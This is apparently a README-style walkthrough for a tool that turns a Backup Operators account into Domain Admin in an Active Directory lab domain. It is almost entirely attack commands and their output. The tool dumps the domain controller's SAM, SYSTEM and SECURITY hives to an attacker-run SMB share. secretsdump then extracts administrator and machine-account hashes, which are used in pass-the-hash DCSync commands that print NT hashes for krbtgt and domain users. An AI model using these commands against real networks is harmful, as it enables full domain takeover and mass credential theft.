If you compromise an account member of the group Backup Operators you can become the Domain Admin without RDP or WinRM on the Domain Controller.
All credit from filip_dragovic with his inital POC ! I build this project because I wanted to have a more generic binary with parameters and also being able to export the SAM database on the remote share!
.sln
file from Github Repo (or trust mine below.)First it it important to be sure the user is member of the ‘Backup Operator’ group.
Microsoft Windows [Version 10.0.19043.1526]
(c) Microsoft Corporation. All rights reserved.
C:\Users\johndo>whoami
offsec\johndo
C:\Users\johndo>net user johndo /domain
The request will be processed at a domain controller for domain offsec.nl.
User name johndo
Full Name John Do
[...]
Local Group Memberships *Backup Operators
Global Group memberships *Domain Users
The command completed successfully.
It is recommended to check if the share is reachable from a Windows workstation without additional credentials.
$ smbserver.py -smb2support -ip 10.20.30.16 share .
Impacket v0.9.25.dev1+20220218.140931.6042675a - Copyright 2021 SecureAuth Corporation
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.20.30.12,50555)
[*] AUTHENTICATE_MESSAGE (OFFSEC\johndo,WIN10)
[*] User WIN10\johndo authenticated successfully
[...]
PS C:\> .\BackupOperatorToDA_release.exe -t \\srv2019.offsec.nl -u johndo -p Welkom1234 -d offsec.nl -o \\10.20.30.16\share\
Making user token
Dumping SAM hive to \\10.20.30.16\share\SAM
Dumping SYSTEM hive to \\10.20.30.16\share\SYSTEM
Dumping SECURITY hive to \\10.20.30.16\share\SECURITY
Two hashes can be used from here, the ’$MACHINE.ACC’ and/or ‘administrator’ hash.
$ secretsdump.py -sam SAM -system SYSTEM -security SECURITY LOCAL
Impacket v0.9.25.dev1+20220218.140931.6042675a - Copyright 2021 SecureAuth Corporation
[*] Target system bootKey: 0x9319e551be8d75919967f0065e0132b9
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:97f2592347d8fbe42be381726ff9ea83:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
$MACHINE.ACC:plain_password_hex:43bcb[...]
$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:e1842947e54ab3d9a8758531e8fc6049
[...]
$ secretsdump.py offsec.nl/administrator@srv2019.offsec.nl -hashes :97f2592347d8fbe42be381726ff9ea83 -just-dc
Impacket v0.9.25.dev1+20220218.140931.6042675a - Copyright 2021 SecureAuth Corporation
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:97f2592347d8fbe42be381726ff9ea83:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:a0b5d64d34935c8a4780b715cfb444c4:::
offsec.nl\MARSHALL_FRANKS:1103:aad3b435b51404eeaad3b435b51404ee:dacd6680af15849bb89a4f0da30e99b0:::
offsec.nl\JAMES_VAUGHAN:1104:aad3b435b51404eeaad3b435b51404ee:75ed74673dd7bf358d48207fdd0d42e0:::
offsec.nl\WARD_CONTRERAS:1105:aad3b435b51404eeaad3b435b51404ee:e0e7955fe13737060bd2d0c5049a78d2:::
offsec.nl\EDDY_MILES:1106:aad3b435b51404eeaad3b435b51404ee:f41a8d181561d36de8ebfc96a0caac0f:::
offsec.nl\ANDREW_VASQUEZ:1107:aad3b435b51404eeaad3b435b51404ee:bc13660676fce9b4aab8fac6ed8adcd5:::
offsec.nl\ULYSSES_COTE:1108:aad3b435b51404eeaad3b435b51404ee:c7f0cab839fde136be09348e15febaba:::
[...]
$ secretsdump.py offsec.nl/'srv2019$'@srv2019.offsec.nl -hashes :e1842947e54ab3d9a8758531e8fc6049 -just-dc
Impacket v0.9.25.dev1+20220218.140931.6042675a - Copyright 2021 SecureAuth Corporation
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:97f2592347d8fbe42be381726ff9ea83:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:a0b5d64d34935c8a4780b715cfb444c4:::
offsec.nl\MARSHALL_FRANKS:1103:aad3b435b51404eeaad3b435b51404ee:dacd6680af15849bb89a4f0da30e99b0:::
offsec.nl\JAMES_VAUGHAN:1104:aad3b435b51404eeaad3b435b51404ee:75ed74673dd7bf358d48207fdd0d42e0:::
offsec.nl\WARD_CONTRERAS:1105:aad3b435b51404eeaad3b435b51404ee:e0e7955fe13737060bd2d0c5049a78d2:::
offsec.nl\EDDY_MILES:1106:aad3b435b51404eeaad3b435b51404ee:f41a8d181561d36de8ebfc96a0caac0f:::
offsec.nl\ANDREW_VASQUEZ:1107:aad3b435b51404eeaad3b435b51404ee:bc13660676fce9b4aab8fac6ed8adcd5:::
offsec.nl\ULYSSES_COTE:1108:aad3b435b51404eeaad3b435b51404ee:c7f0cab839fde136be09348e15febaba:::
[...]